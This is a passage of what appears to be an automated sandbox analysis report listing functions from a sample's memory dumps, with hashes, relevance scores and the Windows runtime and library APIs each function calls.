                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextCryptRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 829835001-0
                                                                                                          • Opcode ID: 7221041e2781362e968401b4d8e66c7e55982b91c7658dbe0d4c96c6aab4c4f9
                                                                                                          • Instruction ID: a9768651e7160afa27b0876cb5c9790805aa4bca628216ec0c47aefbf674c5ba
                                                                                                          • Opcode Fuzzy Hash: 7221041e2781362e968401b4d8e66c7e55982b91c7658dbe0d4c96c6aab4c4f9
                                                                                                          • Instruction Fuzzy Hash: 04B012649C8D4033DE3557700D5FFCD7F659782358F1404C8E14A110C28DA9D062E308
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113B4CC Relevance: .1, Instructions: 125COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 05f0ddf6e09ede3f1f2e4b245b5a8f7e5b9e1dce63d32f3815c47a0d33c60e02
                                                                                                          • Instruction ID: 0b2df55f801cdbbcc0749b82ca5ac3af6c164976f0dadc85047a2e16235b1826
                                                                                                          • Opcode Fuzzy Hash: 05f0ddf6e09ede3f1f2e4b245b5a8f7e5b9e1dce63d32f3815c47a0d33c60e02
                                                                                                          • Instruction Fuzzy Hash: BE51F1B0E043489FDB18CFA9D984B9DBBF1FB99300F209029E415BB295E7749985CF45
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 011353D4 Relevance: .1, Instructions: 123COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a9074a7ac1b4c7463d8b63c13feefb41ea14ec7b7189a8acab7dc1027813eb82
                                                                                                          • Instruction ID: 11309ad9372afa12ab2c08f9fa366773eefe1e4178ba3900c4f16422b904a437
                                                                                                          • Opcode Fuzzy Hash: a9074a7ac1b4c7463d8b63c13feefb41ea14ec7b7189a8acab7dc1027813eb82
                                                                                                          • Instruction Fuzzy Hash: 5A41F1B0E043489FDB18CFA9D984B9DBBF1AB89300F209029E414BB295E7749845CF49
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113CAC8 Relevance: .1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b0f49f78a4339277a66e88f8a1c65f11b08a42d833e3f65f2c2637e49d001924
                                                                                                          • Instruction ID: 2036a824f16bab73aaf323590e86e0db799179847d2afae2a9fdd52561e9f909
                                                                                                          • Opcode Fuzzy Hash: b0f49f78a4339277a66e88f8a1c65f11b08a42d833e3f65f2c2637e49d001924
                                                                                                          • Instruction Fuzzy Hash: E131A375D01208AFDB05DFA8D850AEEBBB5FF49310F14906AE915B7360DB30AA05CFA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113CBD9 Relevance: .1, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 29087f59eea51d997f78599408f22fa2f4c03c2e047c2e3601a0cb407726ad38
                                                                                                          • Instruction ID: 15d1026fb002952573be678031cb6de6b171d67a58c1f5cd337501edf8c0fdb5
                                                                                                          • Opcode Fuzzy Hash: 29087f59eea51d997f78599408f22fa2f4c03c2e047c2e3601a0cb407726ad38
                                                                                                          • Instruction Fuzzy Hash: 1F31D375D01208AFDB05CFA8D890AEEFBB5FF49310F10906AE915B7360DB309A05CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113C9B9 Relevance: .1, Instructions: 89COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 18e20f92944fe99e0bb475f87ed738e980778b80b177398321dcbe273fcd6d93
                                                                                                          • Instruction ID: 672e21d061954f81d400777558ca35ecc37c622fafccc75b54aa04b281096ec9
                                                                                                          • Opcode Fuzzy Hash: 18e20f92944fe99e0bb475f87ed738e980778b80b177398321dcbe273fcd6d93
                                                                                                          • Instruction Fuzzy Hash: F331B575D11208AFDB05CFA9D850AEEFBB5FF49310F10906AE915B7360DB309A04CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113C9C0 Relevance: .1, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f7128ed6789806c68eef73c7490c63722817877d03a2c73216cfe9f84d042305
                                                                                                          • Instruction ID: 92afe14f3ca69f0283fa3111815b9a8b4ecff075d7c39ab06a1316379c89bdae
                                                                                                          • Opcode Fuzzy Hash: f7128ed6789806c68eef73c7490c63722817877d03a2c73216cfe9f84d042305
                                                                                                          • Instruction Fuzzy Hash: 2C31B375D01208AFDB05CFA8D850AEEFBB5FF49310F10906AE915B7360DB30AA04CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113CBE0 Relevance: .1, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bafd8f39df481024c58e6f3e00c5a1eed7113ac86604e3db964c7aad6b079d41
                                                                                                          • Instruction ID: ea2b52e809a9268f5fb16038773b0ddb388b0250fd668dcef1586d1e3ceba96f
                                                                                                          • Opcode Fuzzy Hash: bafd8f39df481024c58e6f3e00c5a1eed7113ac86604e3db964c7aad6b079d41
                                                                                                          • Instruction Fuzzy Hash: 2D31B275D01208AFDB05CFA8D850AEEFBB5FF49310F10906AE915B7360DB30AA05CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113CAD0 Relevance: .1, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4d9421f33146b30848c84aed407403588913dfee0e0715ddf238ddcc9b602088
                                                                                                          • Instruction ID: cbc1b601bf855b84051064dafa2a118a57182d1fb7ae6a5e8cfea63301c2869d
                                                                                                          • Opcode Fuzzy Hash: 4d9421f33146b30848c84aed407403588913dfee0e0715ddf238ddcc9b602088
                                                                                                          • Instruction Fuzzy Hash: A531A075D01208AFDB05CFA8D850AEEBBB5AF49310F10906AE915B7360DB30AA04CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0884B0 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b2b92714cca1114ec26d70ffe6223791c7de0b9582fba5961ff42575a7cbec80
                                                                                                          • Instruction ID: b81bbd05b790d468830d49c969f8de24291617e0899308c772dfb82354ab8e61
                                                                                                          • Opcode Fuzzy Hash: b2b92714cca1114ec26d70ffe6223791c7de0b9582fba5961ff42575a7cbec80
                                                                                                          • Instruction Fuzzy Hash: F1115EB2908609EFCB04CF59D841799FBF4FB45724F10826EE81993B80D735A910CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F096FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • operator+.LIBCMT ref: 6F096FCC
                                                                                                            • Part of subcall function 6F094147: DName::DName.LIBCMT ref: 6F09415A
                                                                                                            • Part of subcall function 6F094147: DName::operator+.LIBCMT ref: 6F094161
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameName::Name::operator+operator+
                                                                                                          • String ID:
                                                                                                          • API String ID: 2937105810-0
                                                                                                          • Opcode ID: d688d64ee6362349c1d848d3ff64d7be9ca9abbb5cad2309763594d5db3039e9
                                                                                                          • Instruction ID: f771f03dc92d1ef88c736b851cf5a1338dd2fc6ef03e54f8b71b5f55b0803b33
                                                                                                          • Opcode Fuzzy Hash: d688d64ee6362349c1d848d3ff64d7be9ca9abbb5cad2309763594d5db3039e9
                                                                                                          • Instruction Fuzzy Hash: 9AD13D76900209AFDF11CFA8C991BEEBBF8EF09314F00915AE555E7290FB34AA45DB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08EC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08ECA5
                                                                                                          • __mtterm.LIBCMT ref: 6F08ECB1
                                                                                                            • Part of subcall function 6F08E97C: DecodePointer.KERNEL32(0000000F,6F08A397,6F08A37D,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08E98D
                                                                                                            • Part of subcall function 6F08E97C: TlsFree.KERNEL32(00000024,6F08A397,6F08A37D,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08E9A7
                                                                                                            • Part of subcall function 6F08E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6F08A397,6F08A37D,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F092325
                                                                                                            • Part of subcall function 6F08E97C: DeleteCriticalSection.KERNEL32(00000024,?,?,6F08A397,6F08A37D,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F09234F
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6F08ECC7
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6F08ECD4
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6F08ECE1
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6F08ECEE
                                                                                                          • TlsAlloc.KERNEL32(?,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08ED3E
                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08ED59
                                                                                                          • __init_pointers.LIBCMT ref: 6F08ED63
                                                                                                          • EncodePointer.KERNEL32(?,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08ED74
                                                                                                          • EncodePointer.KERNEL32(?,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08ED81
                                                                                                          • EncodePointer.KERNEL32(?,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08ED8E
                                                                                                          • EncodePointer.KERNEL32(?,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08ED9B
                                                                                                          • DecodePointer.KERNEL32(Function_0006EB00,?,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08EDBC
                                                                                                          • __calloc_crt.LIBCMT ref: 6F08EDD1
                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,6F08A2D4,6F0B95C0,00000008,6F08A468,?,?,?,6F0B95E0,0000000C,6F08A523,?), ref: 6F08EDEB
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6F08EDFD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                          • API String ID: 1868149495-3819984048
                                                                                                          • Opcode ID: f3e766c2dba1285cd1b24ced33382565646125034dd655b0a3e6d4246b6d76e0
                                                                                                          • Instruction ID: 9fdcafa215616b204ab99784cb2e2f7f0c0318c4d7810f5ce64f702d50a21105
                                                                                                          • Opcode Fuzzy Hash: f3e766c2dba1285cd1b24ced33382565646125034dd655b0a3e6d4246b6d76e0
                                                                                                          • Instruction Fuzzy Hash: 96319075900F94AADF119FB4EE08F1A3BE5BB46734710456BF830932A0DB759061EF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F030EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                          • String ID: invalid string position$string too long
                                                                                                          • API String ID: 1771113911-4289949731
                                                                                                          • Opcode ID: d79ea15f5b2344ccfb044b4758ee9b946378efacd7a1d7fc2876d308e4b2143c
                                                                                                          • Instruction ID: abecc92a0ee48cbd6a83f212c28dcbf8a56ba641d3c3c286894a1fab999ca2ba
                                                                                                          • Opcode Fuzzy Hash: d79ea15f5b2344ccfb044b4758ee9b946378efacd7a1d7fc2876d308e4b2143c
                                                                                                          • Instruction Fuzzy Hash: 18B18072F04156ABDB28CE1CCD90B9E73A6EB897087544A1DF852CB781C774EC41CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F097FC4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 138COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • UnDecorator::getBasicDataType.LIBCMT ref: 6F097FFF
                                                                                                          • DName::operator=.LIBCMT ref: 6F098013
                                                                                                          • DName::operator+=.LIBCMT ref: 6F098021
                                                                                                          • UnDecorator::getPtrRefType.LIBCMT ref: 6F09804D
                                                                                                          • UnDecorator::getDataIndirectType.LIBCMT ref: 6F0980CA
                                                                                                          • UnDecorator::getBasicDataType.LIBCMT ref: 6F0980D3
                                                                                                          • operator+.LIBCMT ref: 6F098166
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                                                                          • String ID: PXo$std::nullptr_t$volatile
                                                                                                          • API String ID: 2203807771-2822416849
                                                                                                          • Opcode ID: ebcda33e787b6fb50ddf97b2f597588b8b2d2ff0c44b6a5c991e451c9802ef6b
                                                                                                          • Instruction ID: 64ee6259ddfb313c933a505011ef985e5e00d2011f100ca56bb7fec81bc78953
                                                                                                          • Opcode Fuzzy Hash: ebcda33e787b6fb50ddf97b2f597588b8b2d2ff0c44b6a5c991e451c9802ef6b
                                                                                                          • Instruction Fuzzy Hash: A6419371808548FFCB118FA4CE40BED7BF8FB46355F80A156E9946B291F731A641EB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03F95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F03FA0F
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F03FA22
                                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6F03FA5A
                                                                                                            • Part of subcall function 6F043A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F043B71
                                                                                                            • Part of subcall function 6F043A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F043B83
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F046A08
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F046A15
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F046A41
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                            • Part of subcall function 6F03DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F03DFF6
                                                                                                            • Part of subcall function 6F03DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F03E003
                                                                                                            • Part of subcall function 6F03DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F03E02F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                                          • String ID: RS7m$RS{m
                                                                                                          • API String ID: 959723449-144615663
                                                                                                          • Opcode ID: 493a0c87f79095fd379438d56f8b66cb01de371deb2942efa01b3c6a1f8e384d
